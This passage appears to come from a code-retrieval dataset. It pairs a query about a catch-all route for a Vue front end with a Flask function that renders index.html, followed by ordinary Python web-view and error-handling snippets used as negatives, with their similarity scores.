fitting(minimizes raw data and fit)\n\n if(p[0] < 1 and p[5] < 1 and p[1] > 0 and p[1] < 30 and p[2] > 0 and p[2] < 30 and p[6] > 0 and p[6] < 30 and p[7] > 0 and p[7] < 30):\n #print(\"pass case\")\n return(p)\n else:\n print(\"failed case\")\n print(\"height1\", p[0],\"height2\", p[5], \"X\", p[1],\"Y\", p[2],\"Y1\", p[6], \"Y2\", p[7])\n print(\"bounding error\" + str(numero)) \n\n return p", "def calculateGaussian(x, mean, stdev):\n\t\t\texponent = math.exp(-(math.pow(x-mean,2)/(2*math.pow(stdev,2))))\n\t\t\tvalue= (1 / (math.sqrt(2*math.pi) * stdev)) * exponent\n\t\t\tif value==0:\n\t\t\t\treturn np.nan\n\t\t\telse:\n\t\t\t\treturn math.log(value)", "def fit_gaussian(self, velocities, powers, center):\n\n def just_amp_width(x, *p):\n \"p = (amplitude, width)\"\n return p[0] * np.exp(-((x - center) / p[1])**2)\n\n def full_fit(x, *p):\n \"p = (amplitude, width, center, background)\"\n return p[3] + p[0] * np.exp(-((x - p[2]) / p[1]) ** 2)\n\n center_index = len(velocities) // 2\n dv = velocities[1] - velocities[0]\n coeffs = [powers[center_index], 4 * dv] # initial guesses\n # estimate the amplitude\n coeff, var_matrix = curve_fit(\n just_amp_width, velocities, powers, p0=coeffs)\n\n # append coefficients to coeff for next fit\n new_coeff = [coeff[0], coeff[1], center, powers.mean()]\n final_coeff, var_matrix = curve_fit(\n full_fit, velocities, powers, p0=new_coeff\n )\n return dict(width=final_coeff[1],\n amplitude=final_coeff[0],\n center=final_coeff[2])", "def estimateGaussian(X):\n mu = X.mean(0, keepdims=True).T\n sigma2 = X.var(0, keepdims=True).T\n return mu, sigma2", "def gauss(x, *p):\n A, mu, sigma = p\n\n return A*np.exp(-(x-mu)**2/(2.*sigma**2))", "def gaussian_kernel(fsize, sigma):\n\n _x = _y = (fsize - 1) / 2\n x, y = np.mgrid[-_x:_x + 1, -_y:_y + 1]\n G = np.exp(-0.5 * (x**2 + y**2) / sigma**2)\n\n return G / G.sum()" ]
[ "0.68242663", "0.6790471", "0.67830956", "0.67823905", "0.67808473", "0.67197216", "0.67171425", "0.661976", "0.6550336", "0.6550336", "0.6507729", "0.64968884", "0.64913034", "0.64834434", "0.64469576", "0.6435371", "0.6381322", "0.6359356", "0.63252896", "0.6323852", "0.63093674", "0.62726945", "0.62665004", "0.6231665", "0.62253875", "0.62209135", "0.6216406", "0.6208563", "0.6201968", "0.6199323", "0.61916107", "0.6184906", "0.6173687", "0.61634463", "0.6151679", "0.6114588", "0.6074141", "0.60722035", "0.6066313", "0.60656875", "0.60550714", "0.6044955", "0.60071504", "0.6005987", "0.60001224", "0.59615576", "0.59587634", "0.59579605", "0.5954158", "0.5954158", "0.5954158", "0.5951571", "0.5942173", "0.59357667", "0.5918325", "0.5917329", "0.59112835", "0.5908893", "0.5902238", "0.58959436", "0.58657295", "0.5862573", "0.58589125", "0.5854492", "0.5846804", "0.5841227", "0.582916", "0.5826012", "0.5825096", "0.58207196", "0.5817486", "0.58174545", "0.58143735", "0.5807225", "0.5804523", "0.5804319", "0.5790789", "0.5787109", "0.5778747", "0.57770514", "0.57731414", "0.57667476", "0.57640773", "0.5761613", "0.5758186", "0.57576734", "0.57548743", "0.5753031", "0.57471055", "0.5739179", "0.5735551", "0.5734185", "0.57307357", "0.5730633", "0.57192886", "0.57073766", "0.5704744", "0.57040983", "0.56825197", "0.5681441" ]
0.5754527
87
method catches all requests that are not api requests ensures routing possibilities within VUE
def catch_all(path=''): return render_template('index.html')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serve(self, request, *args, **kwargs):\n raise Http404", "def serve(self, request, *args, **kwargs):\n raise Http404", "def serve(self, request, *args, **kwargs):\n raise Http404", "def serve(self, request, *args, **kwargs):\n raise Http404", "def serve(self, request, *args, **kwargs):\n raise Http404", "def test_unknown_routes():\n response = client.get(\"/unknown_endpoint\",\n headers={\"content-type\": \"application/json\"})\n assert response.status_code == status.HTTP_404_NOT_FOUND\n assert response.json() == {\"detail\": \"Not Found\"}", "def index_route(self, request, *args, **kwargs):\n raise Http404()", "def ping_missing_api(request):\r\n return _api_response(request, {\r\n 'success': False,\r\n 'message': 'The API url should be /api/v1'\r\n })", "def handle_request_unknown(self, msg):\n\t\traise NotFound()", "def handle_notify_request(self) -> HttpResponse:\n return HttpResponseNotFound()", "def vue_exception_handler(exc, context):\n if isinstance(exc, exceptions.APIException) and isinstance(exc.detail, (list, dict)):\n exc.detail = _flatten_vue_validation(exc.detail)\n\n return drf_exception_handler(exc, context)", "def notfound(request):\n return {}", "def handle_error(self, e):\n code = getattr(e, 'code', 500) # Gets code or defaults to 500\n if code == 404:\n return self.make_response({\n 'message': 'not-found',\n 'code': 404\n }, 404)\n return super(MyApi, self).handle_error(e) # handle others the default way", "def _route_get(self):\n if self.path == '/status':\n self._create_status()\n else:\n self._create_method_not_allowed()", "def opt_engine_rest_api():\n request_json = request.get_json()\n return process_request(request_json)", "def route_rejected(self, prefix, next_hop, as_path):", "def goblin(request, path):\n print \"This endpoint is throwing a 404 error!\"", "def view(obj, request):\n return HTTPNotFound()", "def index(request):\r\n badRequest(\"Url not found\")", "def view(self, url):\r\n abort(404)", "def dispatch(self, request, *args, **kwargs):\n\n if self.page['page_type'] != self.page_type:\n raise Http404\n return super().dispatch(request, *args, **kwargs)", "def _route(self, request, url):\n operationIndex = url[:-1].rfind('/')\n processorPath = url[:operationIndex]\n processor = self.api_processor_map.get(processorPath.lower()) \n operation = url[operationIndex+1:].rstrip('/').lower()\n \n http_methods, is_admin, is_cron = self.api_const.get_api_operation_perms(operation)\n \n if is_cron and users.get_current_user() is not None and not users.is_current_user_admin() :\n raise self.api_error.ApiError(self.api_error.API_ERROR_ADMIN_OPERATION, operation)\n \n if is_admin and not is_cron and not users.is_current_user_admin():\n raise self.api_error.ApiError(self.api_error.API_ERROR_ADMIN_OPERATION, operation)\n \n if request.method not in http_methods:\n raise self.api_error.ApiError(self.api_error.API_ERROR_INVALID_HTTP_METHOD, request.method, operation)\n \n if is_cron :\n context.get_context().set_login_required(False)\n \n return self._process(request, processor(), operation)", "def cloud_handler(event, context):\n # Payload & Headers initialization for GET API calls\n payload = {}\n headers = {}\n\n url = CORRECT_URL + \":\" + WRONG_PORT + API\n\n response = get_call_api(url, payload, headers)\n response_code = response.status_code\n try:\n response_data = response.json()\n except Exception as e:\n response_data = json.dumps(\"Error : {}\".format(e))\n\n return {\n \"url\": url,\n \"data\": response_data,\n \"status_code\": response_code\n }", "def handle_failure_request(self) -> HttpResponse:\n return HttpResponseNotFound()", "def dispatch_request(self, *args, **kwargs):\n try:\n return super().dispatch_request(*args, **kwargs)\n except HTTPException as e:\n logger.error(\"HTTP Error on APIResource %s\", e, exc_info=1)\n return return_response({\n \"code\": e.code,\n \"message\": e.description\n }, e.code)\n except BaseException as e:\n logger.error(\"Error occurred in APIResource %s\", e, exc_info=1)\n return return_response({\n \"code\": 500,\n \"message\": str(e)\n }, 500)", "def page_not_found(e):\n\n # Respons to api request\n if request.accept_mimetypes.accept_json and \\\n not request.accept_mimetypes.accept_html:\n resp = jsonify({'error': 'not found'})\n resp.status_code = 404\n return resp\n\n return render_template('errors/404.html'), 404", "def _pre_dispatch(self, request, *args, **kwargs):\n pass", "def process_request(self, request):\n # This middleware is only needed for regular browser pages.\n # It is incompatible with the mobile apps and APIs in general.\n if is_feature_enabled() and not is_api_request(request):\n self.patch_request(request)", "def route( request, c ):", "def route(self):\n pass", "def routes(self, body):\n pass", "async def generic_action(self, request):\n pass", "def extras_router(request, query):\n for pattern, func, req in patterns:\n match = pattern.match(query)\n if match and req:\n return func(request, **match.groupdict())\n elif match:\n return func(**match.groupdict())\n\n # Returns an Unimplemented response if no pattern matches\n return json_response(status=\"Unimplemented\", \n status_code=501, \n error=\"\", \n content=\"query: %s\" % query)", "def extras_router(request, query):\n for pattern, func, req in patterns:\n match = pattern.match(query)\n if match and req:\n return func(request, **match.groupdict())\n elif match:\n return func(**match.groupdict())\n\n # Returns an Unimplemented response if no pattern matches\n return json_response(status=\"Unimplemented\", \n status_code=501, \n error=\"\", \n content=\"query: %s\" % query)", "def index():\n # curl -k -X POST https://127.0.0.1:43210/api/v1.0 -H 'content-type: application/json' -d '{\"data\": \"exhaust\"}'\n return jsonify({'meta': {'success': True, 'code': 200}, 'result': {\"message\": request.get_json()}}), 200", "def test_bad_method(self):\n\n request = service.get_request('GET', {})\n x = self.start_request_tests(request)\n # GET method not allowed\n self.assertEqual(x.status_code, 405)\n # TBD: check for informativeness\n json.dump(x.to_dict(), sys.stdout, indent=2)", "def _handle_request(self, method, url, handler):\n if not(method in self.handlers):\n handler.set_status(405) # Method Not Allowed\n handler.write({})\n return\n for (path, fn) in self.handlers[method].items():\n if re.match(path, url):\n fn(url, handler)\n return\n handler.set_status(404) # Not Found\n handler.write({})", "async def _response_handler(self):", "def not_found():\n return HttpError(404)", "def index():\n\n return redirect(api)", "def view(self, url):\n abort(404)", "def do_GET(self):\n if not self.path or self.path == \"/\":\n self.redirect()\n elif self.is_viewvc():\n try:\n self.run_viewvc()\n except IOError:\n # ignore IOError: [Errno 32] Broken pipe\n pass\n else:\n self.send_error(404)", "def match_request(self):\n try:\n url_rule, self.request.view_args = \\\n self.url_adapter.match(return_rule=True)\n self.request.url_rule = url_rule\n except HTTPException as e:\n self.request.routing_exception = e", "def process_request(self, request):\n if hasattr(request, 'user') and request.user.is_authenticated():\n return None\n # Looking by url names\n match = resolve(request.path_info)\n if match.view_name in self.url_exceptions:\n return None\n # Looking by regexp matching\n for url in self.regexp_exceptions:\n if url.match(request.path_info):\n return None\n return redirect_to_login(request.get_full_path())", "def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)", "def xhr_not_found_view(request):\n return HTTPNotFound()", "async def handle_request(self, api_endpoint, api_version):\n code = 400\n data = self.get_post_data()\n request_method = self.request.method.lower()\n if data:\n try:\n # will call process_get or process_post methods for the given API\n res = await getattr(api_endpoint, 'process_' + request_method)(api_version, data)\n code = 200\n except ValidationError as validerr:\n if validerr.absolute_path:\n res = '%s : %s' % (\n validerr.absolute_path.pop(), validerr.message)\n else:\n res = '%s' % validerr.message\n LOGGER.error('ValidationError: %s', res)\n raise tornado.web.HTTPError(reason=res)\n except ValueError as valuerr:\n res = str(valuerr)\n LOGGER.error('ValueError: %s', res)\n raise tornado.web.HTTPError(reason=res)\n except DatabaseError as dberr:\n err_id = dberr.__hash__()\n res = str(dberr.reason)\n LOGGER.error(res)\n LOGGER.info(\"Input data for <%s>: %s\", err_id, data)\n raise dberr\n except Exception as err: # pylint: disable=broad-except\n err_id = err.__hash__()\n res = 'Internal server error <%s>:' \\\n 'please include this error id in bug report.' % err_id\n code = 500\n LOGGER.exception(res)\n LOGGER.info(\"Input data for <%s>: %s\", err_id, data)\n raise tornado.web.HTTPError(reason=res)\n else:\n res = 'Error: malformed input JSON.'\n LOGGER.error(res)\n raise tornado.web.HTTPError(reason=res)\n\n # raise tornado.web.HTTPError(status_code=444, reason='error happened')\n self.set_status(code)\n self.write(res)", "def get(self, request):\n pass", "async def _noop_error_handler(ctx: \"RequestContext\") -> None:", "async def handle_request(self, request: aioweb.request.Request):", "def do_GET(self):\n global st_point, cur_request\n if time.time() - st_point < 1 and cur_request > args.MAX_REQ:\n self.send_response(429)\n self.send_header(\"Content-type\",\"text/html\")\n self.end_headers()\n time.sleep(0.2)\n return\n elif time.time() - st_point > 1:\n st_point = time.time()\n cur_request = 1\n self.func_PARSE()\n if self.parsed_url[2] in [\"/ping\", \"/cats\"]:\n self.func_DO()\n else:\n self.send_response(400)\n text=\"<h1 align=center>Bad request</h1>\"\n self.func_PRINT(text)", "def handle_request(self, request: HttpParser) -> None:\n raise NotImplementedError() # pragma: no cover", "def api_handler(request):\n\n\tif request.method == \"GET\":\n\n\t\tform = ApiForm(request.GET)\n\n\t\tif form.is_valid():\n\n\t\t\tif form.cleaned_data[\"data\"] == \"product\":\n\n\t\t\t\t# Get the system discound\n\t\t\t\tsystem_discount = True if request.user.is_authenticated else False\n\t\t\t\tif system_discount:\n\t\t\t\t\tdiscount_per = 20\n\n\t\t\t\tif form.cleaned_data[\"q\"]:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tproduct = Products.objects.get(hash_key=form.cleaned_data[\"q\"])\n\t\t\t\t\t\treturn JsonResponse({\"STATUS\": True, \"product\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"hash_key\": product.hash_key,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"image_0\": (product.image_0.url).replace(\"&export=download\", \"\") if product.image_0.url else None,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"image_1\": (product.image_1.url).replace(\"&export=download\", \"\") if product.image_1.url else None,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"available\": product.available,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"pk\": product.pk,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"name\": product.name, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"price\": product.price * (100 - discount_per) / 100 if system_discount else product.price, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"discount\": system_discount,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"old_price\": \"{:,.2f}\".format(product.price),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"description\": product.description,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"available_sizes\": product.available_sizes[0][\"sizes\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"card_color\": product.card_color,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t\t\t\t})\n\t\t\t\t\texcept Products.DoesNotExist:\n\t\t\t\t\t\treturn JsonResponse({\"STATUS\": True, \"product\": {}})\n\t\t\t\treturn JsonResponse({\"STATUS\": False})\n\t\t\t\n\t\t\t# Check if the API is asking for a coupon code\n\t\t\telif form.cleaned_data.get(\"data\") == \"coupon\":\n\n\t\t\t\t# Check if the Coupon Code is valid and in the Database\n\t\t\t\ttry:\n\t\t\t\t\tcoupon_data = CouponCodes.objects.get(code=form.cleaned_data.get(\"code\"))\n\n\t\t\t\t\t# Return the Percentage the coupon code has\n\t\t\t\t\treturn JsonResponse({\"STATUS\": True, \"VALID\": True, \"PERCENT\": float(coupon_data.percentage)})\n\t\t\t\texcept CouponCodes.DoesNotExist:\n\t\t\t\t\treturn JsonResponse({\"STATUS\": True, \"VALID\": False, \"PERCENT\": 0})\n\t\t\telse:\n\t\t\t\treturn JsonResponse({\"STATUS\": False})\n\t\telse:\n\t\t\treturn JsonResponse({\"STATUS\": False, \"error_message\": form.errors.get_json_data()})", "def page_not_found(e):\n # Message to the user\n message = {\n \"err\":\n {\n \"msg\": \"This route is currently not supported. Please refer API documentation.\"\n }\n }\n # Making the message looks good\n resp = jsonify(message)\n # Sending OK response\n resp.status_code = 404\n # Returning the object\n return resp", "def route(self, request, url):\n error = None\n try :\n return self._route(request, url)\n except self.api_error.ApiError, a_e:\n error = a_e\n logging.exception(\"API error!\")\n except Exception, e:\n error = self.api_error.ApiError(self.api_error.API_ERROR_UNKNOWN, \"Root error is type '%s' with original message: '%s'.\" % (e.__class__, e.message))\n logging.exception(\"Unknown API error!\")\n \n ret_msg = json.dumps(dict(error_code=error.error_code,error_msg=str(error)), indent=4)\n return HttpResponse(ret_msg, mimetype='application/json')", "def test_api(self):\n new_route = self.route.api(\"new\")\n assert new_route != self.route\n assert new_route.route[\"api\"] == \"new\"", "def dispatch_request(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n self.meth = request.method.lower()\n self.resource = current_app.blueprints.get(request.blueprint, None)\n\n if not any([self.meth in self.methods, self.meth.upper() in self.methods]):\n return self.return_error(405)\n\n self.process_before_request_hooks()\n\n resp = super(Endpoint, self).dispatch_request(*args, **kwargs)\n resp = self.make_response(resp)\n\n resp = self.process_after_request_hooks(resp)\n\n return resp", "def test_gourde_views(self):\n rv = self.app.get(\"/-/\")\n self.assertEqual(rv.status_code, 200)\n\n rv = self.app.get(\"/-/threads\")\n self.assertEqual(rv.status_code, 200)\n\n rv = self.app.get(\"/-/ready\")\n self.assertEqual(rv.status_code, 200)", "def test_unauthenticated_service_blocked(self):\n raise NotImplementedError # FIXME", "def __init__(self, request: object) -> None:\n super().__init__({}, request, URL, Api)", "async def json(request):\n requester = request.headers.get('X-FORWARDED-FOR', None)\n print(\"Serving JSON requested by\", requester)\n try:\n component = request.match_info['component']\n except:\n component = None\n json_data = await data.get_data(component=component)\n return web.json_response(json_data)", "def _configure_api_routes(self, app: FastAPI):\n authenticator = JWTAuthenticator(self.signer)\n\n data_update_publisher: Optional[DataUpdatePublisher] = None\n if self.publisher is not None:\n data_update_publisher = DataUpdatePublisher(self.publisher)\n\n # Init api routers with required dependencies\n data_updates_router = init_data_updates_router(\n data_update_publisher,\n self.data_sources_config,\n authenticator\n )\n webhook_router = init_git_webhook_router(self.pubsub.endpoint, authenticator)\n security_router = init_security_router(self.signer, StaticBearerAuthenticator(self.master_token))\n\n # mount the api routes on the app object\n app.include_router(bundles_router, tags=[\"Bundle Server\"], dependencies=[Depends(authenticator)])\n app.include_router(data_updates_router, tags=[\"Data Updates\"], dependencies=[Depends(authenticator)])\n app.include_router(webhook_router, tags=[\"Github Webhook\"])\n app.include_router(security_router, tags=[\"Security\"])\n app.include_router(self.pubsub.router, tags=[\"Pub/Sub\"])\n\n if self.jwks_endpoint is not None:\n # mount jwts (static) route\n self.jwks_endpoint.configure_app(app)\n\n # top level routes (i.e: healthchecks)\n @app.get(\"/healthcheck\", include_in_schema=False)\n @app.get(\"/\", include_in_schema=False)\n def healthcheck():\n return {\"status\": \"ok\"}\n\n return app", "def handle_request_get(self, msg):\n\n\t\tfor arg in msg.arguments:\n\t\t\tmethod = {\n\t\t\t\t'ucr': self.handle_request_get_ucr,\n\t\t\t\t'meta': self.handle_request_get_meta,\n\t\t\t\t'info': self.handle_request_get_info,\n\t\t\t\t'modules/list': self.handle_request_get_modules,\n\t\t\t\t'modules': self.handle_request_get_modules,\n\t\t\t\t'categories/list': self.handle_request_get_categories,\n\t\t\t\t'categories': self.handle_request_get_categories,\n\t\t\t\t'user/preferences': self.handle_request_get_user_preferences,\n\t\t\t\t'hosts/list': self.handle_request_get_hosts,\n\t\t\t\t'hosts': self.handle_request_get_hosts,\n\t\t\t}.get(arg)\n\t\t\tif method:\n\t\t\t\tself.finished(msg.id, method(msg))\n\t\t\t\treturn\n\t\traise NotFound()", "def _load_api(self):\n self.app.add_url_rule('/scheduler', 'get_scheduler_info', self._apply_auth(api.get_scheduler_info))\n self.app.add_url_rule('/scheduler/jobs', 'add_job', self._apply_auth(api.add_job), methods=['POST'])\n self.app.add_url_rule('/scheduler/jobs', 'get_jobs', self._apply_auth(api.get_jobs))\n self.app.add_url_rule('/scheduler/jobs/reload_jobs', 'reload_jobs', self._apply_auth(api.reload_jobs), methods=['POST'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>', 'get_job', self._apply_auth(api.get_job))\n self.app.add_url_rule('/scheduler/jobs/<job_id>', 'delete_job', self._apply_auth(api.delete_job), methods=['DELETE'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>', 'update_job', self._apply_auth(api.update_job), methods=['PATCH'])\n self.app.add_url_rule('/scheduler/jobs/<id>/reschedule', 'reschedule_job', self._apply_auth(api.reschedule_job), methods=['PATCH'])\n self.app.add_url_rule('/scheduler/jobs/<id>/reschedule_once', 'reschedule_job_once', self._apply_auth(api.reschedule_job_once), methods=['PATCH'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>/pause', 'pause_job', self._apply_auth(api.pause_job), methods=['POST'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>/resume', 'resume_job', self._apply_auth(api.resume_job), methods=['POST'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>/run', 'run_job', self._apply_auth(api.run_job), methods=['POST'])", "def test_get_request_should_not_work(self):\n response = self.client.get(reverse('user-list'))\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)", "def before_all(context):\n set_services(context)\n context.api = {}\n context.repositories = {}\n\n for service, location in context.services.items():\n url = urlparse.urlparse(location)\n api = API(url.scheme + '://' + url.netloc, async=False)\n try:\n context.api[service] = getattr(api, url.path.split('/')[2])\n except:\n context.api[service] = getattr(api, service)", "def test_handle_no_url_match(self):\n with self.assertRaises(Resolver404):\n with mock.patch(self.view) as view:\n self.handler.handle(self.request, '/no/match/')\n\n self.assertFalse(view.called)", "def handle_get(self, request, user, *args, **kwargs):\n\n try:\n # User permission\n if not has_perm(user, AdminPermission.VIPS_REQUEST, AdminPermission.READ_OPERATION):\n self.log.error(\n u'User does not have permission to perform the operation.')\n return self.not_authorized()\n\n id_rule = kwargs.get('id_rule')\n\n if not is_valid_int_greater_zero_param(id_rule):\n self.log.error(\n u'Parameter id_rule is invalid. Value: %s.', id_rule)\n raise InvalidValueError(None, 'id_rule', id_rule)\n\n rule = Rule.objects.get(pk=id_rule)\n contents = RuleContent.objects.filter(rule=rule)\n\n rule_contents = list()\n rule_blocks = list()\n for content in contents:\n block_id = 0\n try:\n block = BlockRules.objects.get(\n content=content.content, environment=content.rule.environment)\n block_id = block.id\n except Exception:\n pass\n\n rule_contents.append(content.content)\n rule_blocks.append(block_id)\n\n return self.response(dumps_networkapi({'rule': {'name': rule.name, 'rule_contents': rule_contents, 'rule_blocks': rule_blocks}}))\n\n except InvalidValueError, e:\n self.log.error('Invalid param')\n return self.response_error(269, e.param, e.value)\n except Rule.DoesNotExist:\n return self.response_error(358)\n except Exception, e:\n self.logerror(e)\n return self.response_error(1)", "def method_not_allowed() :\n raise cherrypy.HTTPError(405, \"Method Not Allowed\")", "def handle_405(request, permitted_methods):\n not_allowed = django.http.HttpResponseNotAllowed(permitted_methods)\n return handle_error(request, not_allowed, \"405.html\")", "def test_precedence(self):\n self.assertViewBehavior(\n status_code=405,\n headers_exclude=\"Cache-Control\")", "def _filter_in_request(self):\n pass", "def check_all_routes(event: ApplicationCreated) -> None:\n\n def remove_prefixes(path: str) -> str:\n path = f\"/{path}\" if not path.startswith(\"/\") else path\n for prefix in prefixes:\n if path.startswith(prefix):\n prefix_length = len(prefix)\n return path[prefix_length:]\n return path\n\n app = event.app\n settings = app.registry.settings\n apinames = settings.get(\"pyramid_openapi3_apinames\")\n if not apinames:\n # pyramid_openapi3 not configured?\n logger.warning(\n \"pyramid_openapi3 settings not found. \"\n \"Did you forget to call config.pyramid_openapi3_spec?\"\n )\n return\n\n for name in apinames: # pragma: no branch\n openapi_settings = settings[name]\n\n if not settings.get(\"pyramid_openapi3.enable_endpoint_validation\", True):\n logger.info(\"Endpoint validation against specification is disabled\")\n return\n\n prefixes = _get_server_prefixes(openapi_settings[\"spec\"])\n\n paths = list(openapi_settings[\"spec\"][\"paths\"].keys())\n routes = [\n remove_prefixes(route.path) for route in app.routes_mapper.routes.values()\n ]\n\n missing = [r for r in paths if r not in routes]\n if missing:\n raise MissingEndpointsError(missing)\n\n settings.setdefault(\"pyramid_openapi3\", {})\n settings[\"pyramid_openapi3\"].setdefault(\"routes\", {})\n\n # It is possible to have multiple `add_route` for a single path\n # (due to request_method predicates). So loop through each route\n # to create a lookup of route_name -> api_name\n for route_name, route in app.routes_mapper.routes.items():\n if remove_prefixes(route.path) in paths:\n settings[\"pyramid_openapi3\"][\"routes\"][route_name] = name", "def handle_request(self, path=None):\n req = get_request()\n resp = super().handle_request(req)\n return to_response(resp)", "def test_unsupported_requests_fail(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 405)\n\n response = self.client.put(self.url)\n self.assertEqual(response.status_code, 405)\n\n response = self.client.patch(self.url)\n self.assertEqual(response.status_code, 405)", "def root_simple_error_handler(exc, *args, app_name=''):\n\n #print('args',args)\n check_exception = 0\n for each_args in args:\n #print('each_args',each_args['view'].__module__)\n if each_args['view'].__module__ == 'hrms.views' or each_args['view'].__module__ == 'pms.views':\n #print('ok')\n check_exception = 1\n if isinstance(exc,ValidationError):\n print('ValidationError',exc)\n print('ValidationError',exc.get_codes())\n #n = dict(exc.detail)\n headers = {}\n if check_exception == 1:\n return Response({'error': exc.detail},status=exc.status_code,headers=headers)\n else:\n return Response(exc.detail,status=exc.status_code,headers=headers)\n\n elif isinstance(exc, exceptions.APIException):\n print('APIException',exc.get_full_details())\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['X-Throttle-Wait-Seconds'] = '%d' % exc.wait\n print('exc.detail',exc.detail)\n if check_exception == 1:\n return Response({'error': exc.detail},status=exc.status_code,headers=headers)\n else:\n return Response(exc.detail,status=exc.status_code,headers=headers)\n\n elif isinstance(exc, Http404):\n print('Http404')\n if check_exception == 1:\n return Response({'error': 'Not found'},status=status.HTTP_404_NOT_FOUND)\n else:\n return Response('Not found',status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n print('PermissionDenied')\n if check_exception == 1:\n return Response({'error': 'Permission denied'},\n status=status.HTTP_403_FORBIDDEN)\n else:\n return Response('Permission denied',status=status.HTTP_403_FORBIDDEN)\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def http_method_not_allowed(self, *args, **kwargs):\n\t\treturn self.abort(status.HTTP_405_METHOD_NOT_ALLOWED)", "def mvcRouter(self, router):\n pass", "def do_GET(self):\n\n files = { \"/index.html\": \"index.html\",\n \"/\" : \"index.html\",\n \"/timeline-min.js\": \"timeline-min.js\",\n \"/timeline.js\": \"timeline.js\",\n \"/timeline.css\": \"timeline.css\"\n }\n if self.path in files:\n self._ServeFile(files[self.path])\n return\n\n if self.path.startswith(\"/api/data\"):\n self._ServeData()\n return\n\n self.send_error(404,'File Not Found: %s' % self.path)", "def login_required_processor(request):\n if request.user.is_authenticated():\n return {}\n if \"de.thefoundation.DENIED\" in request.META:\n return {}\n if request.path.startswith(u\"/media/\"):\n return {}\n if request.path in ['/login/', '/login/failed/', '/imprint/']:\n return {}\n request.META[\"de.thefoundation.DENIED\"] = True\n raise django.http.Http404(handle_404(request))", "def search_api(request):\n data = ApiViewFilters(request.GET, queryset=ApiView.objects.all())\n return render(request, 'template.html', {'filter': data})", "def _handle_api_error(ex):\n if request.path.startswith('/api/'):\n message, detail = str(ex).split(\": \")\n return jsonify(message=message, detail=detail), ex.code\n else:\n return ex", "def forbidden():\n return HttpError(403)", "def prepare_api(self):\n return None", "def filter_request():\n if request.method not in ALLOWED_METHODS:\n return \"Method Not Allowed\", 405\n ua = str(request.user_agent)\n if \"Mozilla\" not in ua or \"Gecko\" not in ua:\n return \"No Scrappers!\", 403", "def lro_handling(self) -> global___Snippet.LroResponseHandling:", "def _dispatch(self, api):\n self._authorize(api)\n self._handle(api)", "def void_request(self):\n try:\n accountant_emails = [[\"{0} {1}\".format(accountant[0], accountant[1]), accountant[2]] for accountant in Users.query.with_entities(Users.first_name, Users.last_name, Users.email).join(Users.user_roles).filter((UserRoles.role == \"STFADM\") & (Users.net_id == \"sherrift\")).all()]\n folder_path = \"{0}/user_uploads/{1}/{2}/\".format(self.__APP_PATH__, request.json[\"net_id\"], request.json[\"request_id\"])\n request_submitted_marker = \"{0}request.submitted\".format(folder_path)\n request_processed_marker = \"{0}request.processed\".format(folder_path)\n request_returned_marker = \"{0}request.returned\".format(folder_path)\n request_voided_marker = \"{0}request.voided\".format(folder_path)\n\n void_message = request.json[\"return_message\"].strip()\n\n if path.exists(request_voided_marker):\n return jsonify({\"success\": False, \"type\": \"error\", \"message\": \"This request has already been voided. Please refresh the page.\"})\n\n if path.exists(request_processed_marker):\n if not get_user_roles(current_user.net_id)[\"STFADM\"]:\n return jsonify({\"success\": False, \"type\": \"error\", \"message\": \"Processed requests cannot be voided by the requester.\"})\n else:\n remove(request_processed_marker)\n\n if path.exists(request_submitted_marker):\n if not get_user_roles(current_user.net_id)[\"STFADM\"]:\n return jsonify({\"success\": False, \"type\": \"error\", \"message\": \"Submitted requests cannot be voided by the requester.\"})\n else:\n remove(request_submitted_marker)\n\n if path.exists(request_returned_marker):\n remove(request_returned_marker)\n\n with open(\"{0}submission.json\".format(folder_path), mode=\"r\") as request_details_json:\n request_details = json.load(request_details_json)\n\n with open(\"{0}submission.json\".format(folder_path), mode=\"w\") as request_details_json:\n date_time = \"{0}\".format(datetime.now()).split()\n\n request_details[\"history\"].append({\"date\": date_time[0],\n \"time\": date_time[1],\n \"action\": \"Voided\",\n \"actor\": {\n \"first_name\": current_user.first_name,\n \"last_name\": current_user.last_name,\n \"email\": current_user.email,\n \"uta_id\": current_user.uta_id\n },\n \"metadata\": {\n \"message\": void_message\n }})\n json.dump(request_details, request_details_json)\n\n with open(request_voided_marker, mode=\"w\") as voided_marker:\n voided_marker.write(\"/n\")\n\n if void_message:\n void_message_html = \"<br><br>Message from {0}:<br>\" \\\n \"<blockquote style='border-left: 3px solid rgb(200, 200, 200); \" \\\n \"border-top-color: rgb(200, 200, 200); border-right-color: \" \\\n \"rgb(200, 200, 200); border-bottom-color: rgb(200, 200, 200); padding-left: 1ex; \" \\\n \"margin-left: 0.8ex; color: rgb(102, 102, 102);'>\" \\\n \"<div style='color: rgb(0, 0, 0);'>{1}</div>\" \\\n \"</blockquote>\".format(current_user.first_name, void_message)\n void_message = \"\\n\\nMessage from 